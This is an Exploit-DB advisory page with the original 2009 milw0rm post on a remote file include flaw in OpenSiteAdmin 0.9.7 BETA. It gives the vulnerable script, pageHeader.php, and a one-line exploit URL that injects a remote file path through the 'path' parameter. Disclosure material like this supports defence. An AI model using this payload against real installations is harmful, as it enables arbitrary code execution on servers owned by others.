OpenSiteAdmin 0.9.7 BETA Remote File Include Vulnerability

vendor:

OpenSiteAdmin

by:

EA Ngel

5.5

CVSS

MEDIUM

Remote File Include

CWE

Product Name: OpenSiteAdmin

Affected Version From: 0.9.7 BETA

Affected Version To: 0.9.7 BETA

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

OpenSiteAdmin 0.9.7 BETA Remote File Include Vulnerability

The OpenSiteAdmin 0.9.7 BETA version is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting a malicious file path in the 'path' parameter of the 'pageHeader.php' file. This allows the attacker to include and execute arbitrary files on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of OpenSiteAdmin or apply appropriate security measures to prevent unauthorized access and file inclusion.

Source

Exploit-DB raw data:

                     [#]OpenSiteAdmin 0.9.7 BETA Remote File Include Vulnerability[#]
                        ----------------------------------------------------------



[@]=====================================================================================================[@]
[+] Author	 	 : EA Ngel
[+] Location    	 : Republik Rakyat Indonesia [RRI]
[+] Situs          	 : www[dot]manadocoding[dot]net
[+] Contact        	 : engelpemula[at]gmail[at]com
[+] Download Script	 : http://sourceforge.net/projects/opensiteadmin/files/
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3rr0r Bu9		 : - pageHeader.php
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3xpl0it		 : http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?]
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Sp3ci4l Th4nks  	 : str0ke > basix > cr4wl3r > kamuiclone > Mr.C > kamuiclone > cokiki > cyberlog
[+]                        angky_tatoki > doniskynet > rezagmas > g4pt3k > my_wisdom > hmei7 > k3nz0 
[+]		           wishnu > bl4ck_3n91n3 > Mr.Crossbeam > kiddies > yadiyauri > zpy > moon_lee 
[+]		           c6 > and friends
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Greetz t00		 : All crew ManadoCoding and All Crew SekuritiOnline
[@]=====================================================================================================[@]


					* GOD BLESS ALL *

# milw0rm.com [2009-09-17]